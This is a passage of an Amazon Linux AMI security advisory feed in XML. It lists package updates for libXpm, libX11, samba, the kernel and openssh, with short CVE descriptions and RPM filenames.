</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46246" title="" id="CVE-2023-46246" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5344" title="" id="CVE-2023-5344" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5441" title="" id="CVE-2023-5441" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5535" title="" id="CVE-2023-5535" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-filesystem" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.1712-1.84.amzn1.noarch.rpm</filename></package><package name="vim-debuginfo" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.1712-1.84.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.1712-1.84.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.1712-1.84.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.1712-1.84.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.1712-1.84.amzn1.x86_64.rpm</filename></package><package name="xxd" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="x86_64"><filename>Packages/xxd-9.0.1712-1.84.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.1712-1.84.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" 
version="9.0.1712" release="1.84.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.1712-1.84.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.1712-1.84.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.1712-1.84.amzn1.i686.rpm</filename></package><package name="xxd" version="9.0.1712" release="1.84.amzn1" epoch="2" arch="i686"><filename>Packages/xxd-9.0.1712-1.84.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1894</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1894: medium priority package update for libXpm</title><issued date="2023-11-29 23:18:00" /><updated date="2023-12-04 21:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-43788:
libXpm: out of bounds read in XpmCreateXpmImageFromBuffer()
NOTE: https://www.openwall.com/lists/oss-security/2023/10/03/1
NOTE: Fixed by: https://gitlab.freedesktop.org/xorg/lib/libxpm/-/commit/2fa554b01ef6079a9b35df9332bdc4f139ed67e0
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43788" title="" id="CVE-2023-43788" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXpm-debuginfo" version="3.5.10" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-debuginfo-3.5.10-2.13.amzn1.x86_64.rpm</filename></package><package name="libXpm" version="3.5.10" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-3.5.10-2.13.amzn1.x86_64.rpm</filename></package><package name="libXpm-devel" version="3.5.10" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-devel-3.5.10-2.13.amzn1.x86_64.rpm</filename></package><package name="libXpm-devel" version="3.5.10" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-devel-3.5.10-2.13.amzn1.i686.rpm</filename></package><package name="libXpm-debuginfo" version="3.5.10" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-debuginfo-3.5.10-2.13.amzn1.i686.rpm</filename></package><package name="libXpm" version="3.5.10" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-3.5.10-2.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1895</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1895: medium priority package update for libX11</title><issued date="2023-11-29 23:18:00" /><updated date="2023-12-04 21:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-43786:
A vulnerability was found in libX11 due to an infinite loop within the PutSubImage() function. This flaw allows a local user to consume all available system resources and cause a denial of service condition.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43786" title="" id="CVE-2023-43786" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libX11-devel" version="1.6.0" release="2.2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-devel-1.6.0-2.2.17.amzn1.x86_64.rpm</filename></package><package name="libX11" version="1.6.0" release="2.2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-1.6.0-2.2.17.amzn1.x86_64.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-debuginfo-1.6.0-2.2.17.amzn1.x86_64.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-common-1.6.0-2.2.17.amzn1.x86_64.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.17.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-debuginfo-1.6.0-2.2.17.amzn1.i686.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.17.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-common-1.6.0-2.2.17.amzn1.i686.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.17.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-devel-1.6.0-2.2.17.amzn1.i686.rpm</filename></package><package name="libX11" version="1.6.0" release="2.2.17.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-1.6.0-2.2.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1896</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1896: medium priority package update for samba</title><issued date="2023-11-29 23:18:00" /><updated date="2023-12-04 21:36:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4091:
SMB client can truncate files to 0 bytes by opening files with OVERWRITE disposition when using the acl_xattr Samba VFS module with the smb.conf setting "acl_xattr:ignore system acls = yes"
CVE-2022-2127:
When doing NTLM authentication, the client sends replies to
cryptographic challenges back to the server. These replies
have variable length. Winbind did not properly bounds-check
the lan manager response length, which despite the lan
manager version no longer being used is still part of the
protocol.
If the system is running Samba's ntlm_auth as authentication backend
for services like Squid (or a very unusual configuration with
FreeRADIUS), the vulnerability is remotely exploitable.
If not so configured, or to exploit this vulnerability locally, the
user must have access to the privileged winbindd UNIX domain
socket (a subdirectory with name 'winbindd_privileged' under "state
directory", as set in the smb.conf).
This access is normally only given to special system services like
Squid or FreeRADIUS that use this feature.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2127" title="" id="CVE-2022-2127" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4091" title="" id="CVE-2023-4091" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-python-test" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.10.16" release="24.68.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.10.16-24.68.amzn1.noarch.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package 
name="samba-libs" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package 
name="libwbclient" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.10.16" release="24.68.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.10.16-24.68.amzn1.noarch.rpm</filename></package><package name="samba-python" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="24.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.10.16-24.68.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="24.68.amzn1" epoch="0" 
arch="i686"><filename>Packages/ctdb-tests-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="24.68.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-common-libs-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.10.16-24.68.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="24.68.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.10.16-24.68.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1897</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1897: medium priority package update for kernel</title><issued date="2023-11-29 23:18:00" /><updated date="2024-06-19 18:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-52845:
In the Linux kernel, the following vulnerability has been resolved:
tipc: Change nla_policy for bearer-related names to NLA_NUL_STRING
CVE-2023-3567:
A use-after-free flaw was found in vcs_read in drivers/tty/vt/vc_screen.c in vc_screen in the Linux Kernel. Through this flaw an attacker with local user access may cause a system crash or a leak of internal kernel information.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3567" title="" id="CVE-2023-3567" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52845" title="" id="CVE-2023-52845" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.330" release="176.540.amzn1" 
epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.330-176.540.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1898</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1898: medium priority package update for openssh</title><issued date="2023-12-18 09:20:00" /><updated date="2023-12-19 14:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-48795:
AWS is aware of CVE-2023-48795, also known as Terrapin, which is found in the SSH protocol and affects SSH channel integrity. A protocol extension has been introduced by OpenSSH which needs to be applied to both the client and the server in order to address this issue. We recommend customers update to the latest version of SSH.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48795" title="" id="CVE-2023-48795" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pam_ssh_agent_auth" version="0.10.3" release="2.22.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.22.81.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="22.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-7.4p1-22.81.amzn1.x86_64.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="22.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-cavs-7.4p1-22.81.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="22.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-7.4p1-22.81.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="22.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-7.4p1-22.81.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="22.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-7.4p1-22.81.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="22.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-7.4p1-22.81.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="22.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-7.4p1-22.81.amzn1.x86_64.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="22.81.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-cavs-7.4p1-22.81.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="22.81.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-7.4p1-22.81.amzn1.i686.rpm</filename></package><package 
name="openssh-server" version="7.4p1" release="22.81.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-7.4p1-22.81.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.22.81.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.22.81.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="22.81.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-7.4p1-22.81.amzn1.i686.rpm</filename></package><package name="openssh" version="7.4p1" release="22.81.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-7.4p1-22.81.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="22.81.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-7.4p1-22.81.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="22.81.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-7.4p1-22.81.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1899</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1899: important priority package update for kernel</title><issued date="2024-01-03 22:37:00" /><updated date="2024-07-03 21:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-6932:
A use-after-free vulnerability in the Linux kernel's ipv4: igmp component can be exploited to achieve local privilege escalation.
A race condition can be exploited to cause a timer to be mistakenly registered on an RCU read-locked object which is freed by another thread.
We recommend upgrading past commit e2b706c691905fe78468c361aaabc719d0a496f1.
CVE-2023-52881:
In the Linux kernel, the following vulnerability has been resolved:
tcp: do not accept ACK of bytes we never sent
CVE-2023-52813:
In the Linux kernel, the following vulnerability has been resolved:
crypto: pcrypt - Fix hungtask for PADATA_RESET
CVE-2023-52340:
When a router encounters an IPv6 packet too big to transmit to the next-hop, it returns an ICMP6 "Packet Too Big" (PTB) message to the sender. The sender caches this updated Maximum Transmission Unit (MTU) so it knows not to exceed this value when subsequently routing to the same host.
In Linux kernels prior to 6.3, garbage collection is run on the IPv6 Destination Route Cache if the number of entries exceeds a threshold when adding the destination to the cache. This garbage collection examines every entry in the cache while holding a lock. In these affected kernel versions, a flood of the IPv6 ICMP6 PTB messages could cause high lock contention and increased CPU usage, leading to a Denial-of-Service.
The fix backports the garbage collection improvements from Linux kernel 6.3 by bringing the IPv6 code closer to the IPv4 code, which does not have this issue.
Patch: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=af6d10345ca76670c1b7c37799f0d5576ccef277
CVE-2023-0590:
A use-after-free flaw was found in qdisc_graft in net/sched/sch_api.c in the Linux Kernel due to a race problem. This flaw leads to a denial of service issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0590" title="" id="CVE-2023-0590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52340" title="" id="CVE-2023-52340" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52813" title="" id="CVE-2023-52813" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52881" title="" id="CVE-2023-52881" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6932" title="" id="CVE-2023-6932" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.334" release="177.552.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-debuginfo-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.334" release="177.552.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.334-177.552.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.334" release="177.552.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.334-177.552.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.334" release="177.552.amzn1" epoch="0" 